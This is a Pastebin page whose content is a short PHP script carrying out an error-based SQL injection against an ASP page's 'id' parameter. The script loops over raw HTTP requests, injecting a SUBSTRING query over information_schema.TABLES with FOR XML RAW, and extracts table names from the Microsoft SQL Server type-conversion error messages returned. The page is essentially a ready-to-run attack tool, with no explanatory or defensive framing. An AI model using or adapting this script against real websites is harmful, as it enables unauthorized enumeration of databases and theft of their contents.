Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $host = "www.test.net";
- $port = 80;
- for($i=$j=0;;$i+=1990,$j++) {
- $p = "GET /index.asp?id=1'".urlencode(" and 1= (SELECT convert(int,SUBSTRING((SELECT TABLE_NAME AS e FROM information_schema.TABLES FOR XML RAW ('a')),$i,1990)))--")." HTTP/1.0\r\n";
- $p.= "Host: $host\r\n";
- $p.= "Connection: close\r\n\r\n";
- $ock = fsockopen(gethostbyname($host), $port);
- if(!$ock) {
- return false;
- }
- fputs($ock, $p);
- $html='';
- while(!feof($ock)) {
- $html.= fgets($ock);
- }
- $html = explode("\r\n\r\n",$html);
- if(stripos($html[1],'type mismatch')!==false) {
- break;
- }
- $out = array();
- preg_match("@the nvarchar value '(.+?)'*( to data type int\.)*</font>@", $html[1], $out);
- if(isset($out[1])) {
- $xml .= htmlspecialchars_decode($out[1]);
- } else {
- break;
- }
- }
- $r = xml_parser_create();
- $out = array();
- xml_parse_into_struct($r, '<root>'.$xml, $out);
- foreach($out as $el) {
- echo $el['attributes']['E']."\r\n";
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement